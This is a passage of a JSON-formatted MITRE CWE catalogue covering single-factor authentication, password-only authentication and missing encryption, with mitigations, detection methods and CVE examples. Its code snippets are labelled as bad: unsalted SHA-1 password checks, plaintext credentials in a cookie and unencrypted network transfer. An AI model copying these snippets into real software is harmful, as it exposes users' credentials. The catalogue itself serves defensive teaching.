Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Multiple Failed Authentication Attempts not Prevented","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Restrict Excessive Authentication Attempts","attr":{"@_Date":"2010-02-16"}}]}},"308":{"attr":{"@_ID":"308","@_Name":"Use of Single-factor Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme.","Extended_Description":"While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused, and common passwords is rampant on the internet. Without the added protection of multiple authentication schemes, a single mistake can result in the compromise of an account. For this reason, if multiple schemes are possible and also easy to use, they should be implemented and required.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"654","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"309","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If the secret in a single-factor authentication scheme gets compromised, full authentication is possible."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use multiple independent authentication schemes, which ensures that -- if one of the methods is compromised -- the system itself is still likely safe from compromise."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using single-factor authentication"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Using Single-factor Authentication","attr":{"@_Date":"2008-04-11"}}}},"309":{"attr":{"@_ID":"309","@_Name":"Use of Password System for Primary Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"654","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"308","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Password systems are the simplest and most ubiquitous authentication mechanisms. However, they are subject to such well known attacks,and such frequent compromise that their use in the most simple implementation is not practical."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"A password authentication mechanism error will almost always result in attackers being authorized as valid users."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"In order to protect password systems from compromise, the following should be noted:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Passwords should be stored safely to prevent insider attack and to ensure that -- if a system is compromised -- the passwords are not retrievable. Due to password reuse, this information may be useful in the compromise of other systems these users work with. In order to protect these passwords, they should be stored encrypted, in a non-reversible state, such that the original text password cannot be extracted from the stored value.","Password aging should be strictly enforced to ensure that passwords do not remain unchanged for long periods of time. The longer a password remains in use, the higher the probability that it has been compromised. For this reason, passwords should require refreshing periodically, and users should be informed of the risk of passwords which remain in use for too long.","Password strength should be enforced intelligently. Rather than restrict passwords to specific content, or specific length, users should be encouraged to use upper and lower case letters, numbers, and symbols in their passwords. The system should also ensure that no passwords are derived from dictionary words."]}}}},{"Phase":"Architecture and Design","Description":"Use a zero-knowledge password protocol, such as SRP."},{"Phase":"Architecture and Design","Description":"Ensure that passwords are stored safely and are not reversible."},{"Phase":"Architecture and Design","Description":"Implement password aging functionality that requires passwords be changed after a certain point."},{"Phase":"Architecture and Design","Description":"Use a mechanism for determining the strength of a password and notify the user of weak password use."},{"Phase":"Architecture and Design","Description":"Inform the user of why password protections are in place, how they work to protect data integrity, and why it is important to heed their warnings."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using password systems"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Using Password Systems","attr":{"@_Date":"2008-04-11"}}}},"311":{"attr":{"@_ID":"311","@_Name":"Missing Encryption of Sensitive Data","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not encrypt sensitive or critical information before storage or transmission.","Extended_Description":"The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the application does not use a secure channel, such as SSL, to exchange sensitive information, it is possible for an attacker with access to the network traffic to sniff packets from the connection and uncover the data. This attack is not technically difficult, but does require physical access to some portion of the network over which the sensitive data travels. This access is usually somewhere near where the user is connected to the network (such as a colleague on the company network) but can be anywhere along the path from the user to the end server."},{"Scope":["Confidentiality","Integrity"],"Impact":"Modify Application Data","Note":"Omitting the use of encryption in any program which transfers data over a network of any kind should be considered on par with delivering the data sent to each user on the local networks of both the sender and receiver. Worse, this omission allows for the injection of data into a stream of communication between two parties -- with no means for the victims to separate valid data from invalid. In this day of widespread network attacks and password collection sniffers, it is an unnecessary risk to omit encryption from the design of any system which might benefit from it."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"The characterizaton of sensitive data often requires domain-specific understanding, so manual methods are useful. However, manual efforts might not achieve desired code coverage within limited time constraints. Black box methods may produce artifacts (e.g. stored data or unencrypted network transfer) that require manual evaluation.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Automated measurement of the entropy of an input/output source may indicate the use or lack of encryption, but human analysis is still required to distinguish intentionally-unencrypted data (e.g. metadata) from sensitive data."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Network Sniffer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Man-in-the-middle attack tool"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify which data or resources are valuable enough that they should be protected by encryption. Require that any transmission or storage of this data/resource should use well-vetted encryption algorithms."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Ensure that encryption is properly integrated into the system design, including but not necessarily limited to:","Identify the separate needs and contexts for encryption:","Using threat modeling or other techniques, assume that data can be compromised through a separate vulnerability or weakness, and determine where encryption will be most effective. Ensure that data that should be private is not being inadvertently exposed using weaknesses such as insecure permissions (CWE-732). [REF-7]"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Encryption that is needed to store or transmit private data of the users of the system","Encryption that is needed to protect the system itself from unauthorized disclosure or tampering"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["One-way (i.e., only the user or recipient needs to have the key). This can be achieved using public key cryptography, or other techniques in which the encrypting party (i.e., the software) does not need to have access to a private key.","Two-way (i.e., the encryption can be automatically performed on behalf of a user, but the key must be available so that the plaintext can be automatically recoverable by that user). This requires storage of the private key in a format that is recoverable only by the user (or perhaps by the operating system) in a way that cannot be recovered by others."]}}]}},{"attr":{"@_Mitigation_ID":"MIT-24"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis.","For example, US government systems require FIPS 140-2 certification.","Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak.","Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267]"]}},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-40"},"Intro_Text":"This code writes a user\'s login information to a cookie so the user does not have to login again later.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function persistLogin($username, $password){}","xhtml:div":{"#text":"$data = array(\\"username\\" =&gt; $username, \\"password\\"=&gt; $password);setcookie (\\"userdata\\", $data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["The code stores the user\'s username and password in plaintext in a cookie on the user\'s machine. This exposes the user\'s login information if their computer is compromised by an attacker. Even if the user\'s machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie.","Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-41"},"Intro_Text":"The following code attempts to establish a connection, read in a password, then store it to a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error(\\"Unknown host\\");memcpy( (char *)&amp;server.sin_addr,(char *)hp-&gt;h_addr,hp-&gt;h_length);if (argc &lt; 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&amp;server, sizeof server) &lt; 0) error(\\"Connecting\\");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) {","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"write(dfd,password_buffer,n);...","xhtml:br":["","",""]}}}},"Body_Text":"While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors."},{"attr":{"@_Demonstrative_Example_ID":"DX-42"},"Intro_Text":"The following code attempts to establish a connection to a site to communicate sensitive information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":[{"#text":"URL u = new URL(\\"http://www.secret.example.org/\\");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod(\\"PUT\\");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//..."}}],"xhtml:br":""}},"Body_Text":"Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2272","Description":"password and username stored in cleartext in a cookie","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272"},{"Reference":"CVE-2009-1466","Description":"password stored in cleartext in a file with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466"},{"Reference":"CVE-2009-0152","Description":"chat program disables SSL in some circumstances even when the user says to use SSL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152"},{"Reference":"CVE-2009-1603","Description":"Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603"},{"Reference":"CVE-2009-0964","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964"},{"Reference":"CVE-2008-6157","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157"},{"Reference":"CVE-2008-6828","Description":"product stores a password in cleartext in memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828"},{"Reference":"CVE-2008-1567","Description":"storage of a secret key in cleartext in a temporary file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567"},{"Reference":"CVE-2008-0174","Description":"SCADA product uses HTTP Basic Authentication, which is not encrypted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174"},{"Reference":"CVE-2007-5778","Description":"login credentials stored unencrypted in a registry key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778"},{"Reference":"CVE-2002-1949","Description":"Passwords transmitted in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949"},{"Reference":"CVE-2008-4122","Description":"Chain: Use of HTTPS cookie without \\"secure\\" flag causes it to be transmitted across unencrypted HTTP.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122"},{"Reference":"CVE-2008-3289","Description":"Product sends password hash in cleartext in violation of intended policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289"},{"Reference":"CVE-2008-4390","Description":"Remote management feature sends sensitive information including passwords in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390"},{"Reference":"CVE-2007-5626","Description":"Backup routine sends password in cleartext in email.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626"},{"Reference":"CVE-2004-1852","Description":"Product transmits Blowfish encryption key in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852"},{"Reference":"CVE-2008-0374","Description":"Printer sends configuration information, including administrative password, in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"},{"Reference":"CVE-2007-4786","Description":"Product sends passwords in cleartext to a log server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786"},{"Reference":"CVE-2005-3140","Description":"Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to encrypt data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":4,"Entry_Name":"Insufficient Transport Layer Protection"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC00-J","Entry_Name":"Use SSLSocket rather than Socket for secure data exchange"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"157"}},{"attr":{"@_CAPEC_ID":"158"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"609"}},{"attr":{"@_CAPEC_ID":"65"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Protecting Secret 